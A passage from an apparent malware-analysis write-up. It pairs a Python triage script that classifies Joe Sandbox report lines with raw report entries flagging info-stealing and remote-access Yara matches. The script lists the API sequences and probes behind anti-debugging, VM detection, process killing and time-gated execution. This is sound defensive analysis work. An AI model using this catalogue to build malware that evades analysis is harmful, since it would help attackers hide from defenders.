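    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49AA0 mov eax, dword ptr fs:[00000030h] 0_2_00F49AA0",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00F498E0",
    r"Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00F47D20",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00F46BC0",
]

# Ordered API subsequences (gaps allowed) and the behaviour each implies.
# Labels are ours, not Joe Sandbox signature names.
API_PATTERNS = {
    "enumerate-and-copy files (FindFirstFile/CopyFile loop)":
        ["FindFirstFileA", "CopyFileA", "FindNextFileA"],
    "process search by name (Toolhelp32 walk)":
        ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"],
    "kill process by name":
        ["CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"],
    "time-gated execution (exit after comparing the clock to a date)":
        ["GetSystemTime", "SystemTimeToFileTime", "ExitProcess"],
    "keyboard-layout / locale check":
        ["GetKeyboardLayoutList", "GetLocaleInfoA"],
    "volume serial read (host fingerprint)":
        ["GetVolumeInformationA"],
}
BULK_GETPROCADDRESS = 8                      # threshold is our assumption
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
VM_REG_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
FUNC_RE = re.compile(r"Code function: (?:\d+_\d+_[0-9A-Fa-f]+\s+)?(.*?)\s*\d+_\d+_[0-9A-Fa-f]+$")


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str


def has_subsequence(seq, pattern):
    """True if every name in pattern occurs in seq in that order, gaps allowed."""
    it = iter(seq)
    return all(any(x == want for x in it) for want in pattern)


def api_chain(body):
    """'FindFirstFileA,StrCmpCA, ...' -> API names; numeric arguments and
    mangled C++ symbols are dropped."""
    return [t for t in re.split(r"[,\s]+", body) if re.fullmatch(r"[A-Za-z_]\w*", t)]


def classify_function(body):
    found = []
    if "fs:[00000030h]" in body:             # TEB+0x30 is the PEB pointer (BeingDebugged, Ldr)
        found.append(Finding("PEB read via fs:[30h]", body))
    apis = api_chain(body)
    for technique, pattern in API_PATTERNS.items():
        if has_subsequence(apis, pattern):
            found.append(Finding(technique, " > ".join(pattern)))
    n = apis.count("GetProcAddress")
    if n >= BULK_GETPROCADDRESS:
        found.append(Finding("bulk dynamic import resolution", f"{n}x GetProcAddress"))
    return found


def classify_line(line):
    """Map one report line to zero or more findings."""
    event = re.sub(r"^Source: \S+\s+", "", line).replace(" Jump to behavior", "").strip()
    m = FUNC_RE.match(event)
    if m:
        return classify_function(m.group(1))
    if event.startswith("Open window title or class name: "):
        return [Finding("analysis-tool window probe (FindWindow-style)", event.split(": ", 1)[1])]
    if event.startswith("File opened: "):
        name = event.split(": ", 1)[1]
        return [Finding("SoftICE device probe", name)] if name in SOFTICE_DEVICES else []
    if event.startswith("Registry key queried: ") and " name: " in event:
        key, _, value = event[len("Registry key queried: "):].partition(" name: ")
        hit = value in VM_REG_VALUES
        return [Finding("VM fingerprint via BIOS/display registry values", key + "\\" + value)] if hit else []
    if event == "Process queried: DebugPort":
        return [Finding("ProcessDebugPort query", event)]
    if event == "Thread information set: HideFromDebugger":
        return [Finding("ThreadHideFromDebugger (NtSetInformationThread)", event)]
    return []


def triage(lines):
    """Technique -> number of report lines that exhibit it."""
    return Counter(f.technique for line in lines for f in classify_line(line))


if __name__ == "__main__":
    for technique, count in sorted(triage(SAMPLE_LINES).items()):
        print(f"{count:2d}  {technique}")
```

The ordered-subsequence match is deliberately loose: StrCmpCA calls, heap allocations and repeated wsprintfA formatting sit between the interesting calls in every chain on this page, so an exact-sequence match would miss most of them, while requiring order (snapshot before walk, OpenProcess before TerminateProcess) keeps an unrelated function that merely imports the same APIs from triggering.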

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP